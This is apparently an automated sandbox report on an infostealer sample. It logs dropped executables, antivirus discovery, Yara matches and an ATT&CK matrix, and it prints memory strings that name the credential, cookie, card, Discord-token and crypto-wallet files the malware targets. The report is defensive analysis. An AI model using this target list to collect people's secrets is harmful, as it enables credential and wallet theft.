Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (9 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\M2.exe | Queries volume information: C:\Users\user\AppData\Roaming\M2.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\M2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\M2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\M2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\M2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\M2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Metin.exe | Queries volume information: C:\Users\user\AppData\Roaming\Metin.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Metin.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (15 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (6 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation (2 occurrences)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\Chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\M2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Metin.exe, 00000009.00000002.2552335179.000000001B9D4000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2531332433.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2552335179.000000001BA66000.00000004.00000020.00020000.00000000.sdmp, Metin.exe, 00000009.00000002.2531332433.0000000000DBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                        Source: C:\Users\user\AppData\Roaming\Metin.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: M2.exe PID: 8096, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPED
Source: Yara match | File source: 9.0.Metin.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.Metin.exe.2ccf5a8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Metin.exe PID: 7184, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Metin.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Chrome.exe, type: DROPPED
Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: f5ATZ1i5CU.exe, 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: powershell.exe, 00000002.00000002.1317956126.00000000064AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
Source: Yara match | File source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: M2.exe PID: 8096, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 6.0.M2.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: M2.exe PID: 8096, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\M2.exe, type: DROPPED
Source: Yara match | File source: 9.0.Metin.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.f5ATZ1i5CU.exe.2e87e58.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.Metin.exe.2ccf5a8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.Metin.exe.2ccf5a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: f5ATZ1i5CU.exe PID: 7928, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Metin.exe PID: 7184, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Metin.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Chrome.exe, type: DROPPED
MITRE ATT&CK matrix (one line per tactic, techniques in the matrix's column order; a leading number is the match badge the report shows on that cell, entries without one are cells with no match):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 13 Windows Management Instrumentation; 1 Native API; 12 Command and Scripting Interpreter; 1 Scheduled Task/Job; 2 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 2 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 151 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 File and Directory Discovery; 33 System Information Discovery; 541 Security Software Discovery; 1 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
